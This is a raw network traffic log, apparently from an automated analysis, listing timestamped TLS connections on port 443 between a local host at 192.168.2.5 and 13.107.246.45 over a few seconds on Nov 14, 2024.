                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.115046978 CET4434978013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.115328074 CET49780443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.115328074 CET49780443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.115361929 CET49780443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.115386009 CET4434978013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.118273973 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.118323088 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.118380070 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.118736982 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.118752003 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.225541115 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.226160049 CET49781443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.226193905 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.226656914 CET49781443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.226663113 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.276746988 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.284534931 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.284559011 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.285252094 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.285260916 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.295655966 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.296108007 CET49783443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.296135902 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.296660900 CET49783443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.296669960 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.356048107 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.356353045 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.356422901 CET49781443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.356503010 CET49781443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.356503010 CET49781443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.356544018 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.356573105 CET4434978113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.359433889 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.359483004 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.359965086 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.360146046 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.360160112 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.410139084 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.410191059 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.411253929 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.411254883 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.411254883 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.412801027 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.412831068 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.412935019 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.413080931 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.413094044 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.478705883 CET4434978413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.479183912 CET49784443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.479223013 CET4434978413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.479679108 CET49784443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.479685068 CET4434978413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.566822052 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.566871881 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.567368031 CET49783443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.567405939 CET49783443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.567424059 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.567440987 CET49783443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.567447901 CET4434978313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.572839022 CET49788443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.572861910 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.572920084 CET49788443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.573470116 CET49788443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.573479891 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.613997936 CET4434978413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.614146948 CET4434978413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.614212990 CET49784443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.614542961 CET49784443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.614566088 CET4434978413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.614578009 CET49784443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.614583969 CET4434978413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.674171925 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.674201965 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.674339056 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.676320076 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.676332951 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.725518942 CET49782443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.725542068 CET4434978213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.866827011 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.868652105 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.868690968 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.869456053 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:33.869462967 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.010862112 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.011455059 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.011588097 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.025854111 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.025892973 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.025911093 CET49785443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.025919914 CET4434978513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104374886 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104410887 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104692936 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104692936 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.104718924 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.106800079 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.107336044 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.107403994 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.107656002 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.107671022 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.165277958 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.166394949 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.166430950 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.166811943 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.166820049 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240027905 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240046978 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240101099 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240230083 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.240230083 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.251357079 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.251357079 CET49786443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.251405001 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.251434088 CET4434978613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255606890 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255654097 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255723953 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255862951 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.255872011 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.297637939 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298022985 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298105001 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298187017 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298187017 CET49787443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298229933 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.298257113 CET4434978713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301554918 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301651001 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301739931 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301884890 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.301915884 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.413260937 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.413809061 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.413822889 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.414339066 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.414344072 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543659925 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543709993 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543785095 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543813944 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543843031 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.543898106 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.544022083 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.544039965 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.544051886 CET49789443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.544059038 CET4434978913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.547039986 CET49793443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.547128916 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.547224998 CET49793443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.547385931 CET49793443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.547405005 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.850508928 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.851289034 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.851321936 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.851795912 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:34.851808071 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161317110 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161355019 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161420107 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161438942 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161468983 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161736012 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161750078 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161758900 CET49790443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.161762953 CET4434979013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.165196896 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.165246964 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.165318966 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.165488005 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.165507078 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.168692112 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.169648886 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.169687986 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.170108080 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.170123100 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.290538073 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.291187048 CET49793443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.291275024 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.291553974 CET49793443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.291568995 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.303247929 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.303309917 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.303761005 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.303838015 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.303910017 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.303935051 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.303949118 CET49791443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.303956032 CET4434979113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.306757927 CET49795443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.306818008 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.307049036 CET49795443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.307152987 CET49795443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.307187080 CET4434979513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.310714960 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.311090946 CET49788443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.311110973 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.311511993 CET49788443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.311522007 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.420407057 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.420556068 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.420777082 CET49793443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.420902967 CET49793443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.420902967 CET49793443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.420948982 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.420979023 CET4434979313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.423713923 CET49796443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.423751116 CET4434979613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.423950911 CET49796443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.424145937 CET49796443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.424158096 CET4434979613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.437463045 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.437670946 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.437722921 CET49788443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.437886000 CET49788443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.437896967 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.437906027 CET49788443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.437911987 CET4434978813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.440830946 CET49797443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.440876007 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.440946102 CET49797443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.441070080 CET49797443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.441082954 CET4434979713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.480705023 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.481307030 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.481400013 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.481758118 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.481771946 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.644865036 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.644958973 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645090103 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645445108 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645445108 CET49792443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645498037 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.645525932 CET4434979213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648684978 CET49798443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648721933 CET4434979813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648787975 CET49798443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648941040 CET49798443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.648952961 CET4434979813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.906409979 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.907027006 CET49794443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.907056093 CET4434979413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:35.907608986 CET49794443192.168.2.513.107.246.45
